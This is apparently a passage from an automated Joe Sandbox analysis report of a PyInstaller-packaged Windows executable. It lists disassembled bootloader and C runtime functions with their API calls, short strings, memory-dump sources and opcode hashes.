                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                        • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                                        • Instruction ID: 86ff5cfed6685b253c51e96a20e5fbbff51d6e43b47276f1da68b3469d468cea
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84318F32A29A8289FB60EF62E9552FD6360FF88788F440136EA4D87B59DF3CD114C740
                                                                                                                                                                                                                                                        Function 00007FF6D9242B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6D924918F,?,00007FF6D9243C55), ref: 00007FF6D9242BA0
                                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF6D9242C2A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                        • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                        • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                        • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                        • Instruction ID: 85dce56bba449f1340d93f693842ff1636657b289a24ffa1f38b38f494c6c679
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7219C62B28B4182F7109F55B9457EE73A4EB88780F404136EA8D97A5ADE3CE225C780
                                                                                                                                                                                                                                                        Function 00007FF6D9242710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6D9241B99), ref: 00007FF6D9242760
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                        • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                        • Instruction ID: ec266cdb73d317d13a84891900914379cc0d77f7eecaa8cb7923f54af5e18ed4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4218172A2978142F720DF55B9817EA63A4FB98384F400136EE8C97A59DF7CD155CB40
                                                                                                                                                                                                                                                        Function 00007FF6D9259A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                        • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                        • Instruction ID: 50e892fcb0c93ea35a16969c53fe9901337e390c14b70dfd75ff9ead6e1f94d7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DCF06229B2D70681FB149F24E95477E6330EF45761F540237DA6E865E8DF2CD068C750
                                                                                                                                                                                                                                                        Function 00007FF6D9269368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                                        • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                        • Instruction ID: 57a8951ce778445f014eaf80a3e6abd5c0670b9b93173366d95ed90449d537ac
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9911947FE7CA0301FA641969E69137D1050AF59370E04063AFA6ED6EDACE6C6875C280
                                                                                                                                                                                                                                                        Function 00007FF6D925B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF6D925A5A3,?,?,00000000,00007FF6D925A83E,?,?,?,?,?,00007FF6D925A7CA), ref: 00007FF6D925B3AF
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D925A5A3,?,?,00000000,00007FF6D925A83E,?,?,?,?,?,00007FF6D925A7CA), ref: 00007FF6D925B3CE
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D925A5A3,?,?,00000000,00007FF6D925A83E,?,?,?,?,?,00007FF6D925A7CA), ref: 00007FF6D925B3F6
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D925A5A3,?,?,00000000,00007FF6D925A83E,?,?,?,?,?,00007FF6D925A7CA), ref: 00007FF6D925B407
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6D925A5A3,?,?,00000000,00007FF6D925A83E,?,?,?,?,?,00007FF6D925A7CA), ref: 00007FF6D925B418
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                        • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                                        • Instruction ID: fb90a12991b22452530c1210b4ef444fb6c480d2db18ebf32fedbcad9f95040d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2113620F2D65242FAE4AF256B5227D51415F447B0F584337D93DD6ADEDE2CF8614301
                                                                                                                                                                                                                                                        Function 00007FF6D925B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                        • Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                                                        • Instruction ID: b60e9824eb3b692cc2a257adf47c6dcc3b03f3ba0b20b1c0232c0b2478847322
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62110C20F2920742FAD8AE726B522BD11425F45770F184736D93ECA6DEDD2CB8618721
                                                                                                                                                                                                                                                        Function 00007FF6D9255FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: verbose
                                                                                                                                                                                                                                                        • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                        • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                        • Instruction ID: 72aeed8262b503a80e801e9b7060d8b1b348493edbb790d38416d8886d3d5a25
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2891D132A28A4681F7A18E25D65037F37A1AB40B94F848137DA5EC73DEDE3CE865C301
                                                                                                                                                                                                                                                        Function 00007FF6D925FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                        • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                        • Instruction ID: 23d84d27ad2f27feff5ad3d29c41107d0454f73bd0f0aa8c5e4f516e5fca7a6b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2781A072F2924385F7E4AE2993803BD36A0AB15B44F558037CE09D7A9DDF2DE9219301
                                                                                                                                                                                                                                                        Function 00007FF6D924D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                        • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                        • Instruction ID: 00c30a4dbf4e877fd229f56bf6859bfe3954585a45b61ac47b2b745876540ac3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98519136B296028AFB14CF15E64467D7791EB68B98F104236DA4E87B44DF7CF861CB40
                                                                                                                                                                                                                                                        Function 00007FF6D924F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                        • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                        • Instruction ID: a65ae7baa2d259212aa81418b6c7f778396c80a12c435dd1792f4b4aa35d46cd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45516572B1868286FB648F2292842AC7790FBA9B94F144137DB5D87B95CF3CE464CF41
                                                                                                                                                                                                                                                        Function 00007FF6D924EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                        • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                        • Instruction ID: 2c27805dceff4a5cd91edf87c41ce63fa428e671e4587d1c75f9c2d47be39264
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10617332918BC585E7609F15E5403AEB7A0FBA9794F044226EB9C57B59DF7CD1A0CF00
                                                                                                                                                                                                                                                        Function 00007FF6D9242810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                                        • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                        • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                        • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                        • Instruction ID: 58ce996719f02433b3117e90c1f4ed89f26977b56c166f27dac903724a8b7b45
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0219C62B28B4182F7109F55B9457EE73A4EB88780F400136EA8D97A5ADE3CE265C780
                                                                                                                                                                                                                                                        Function 00007FF6D925C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
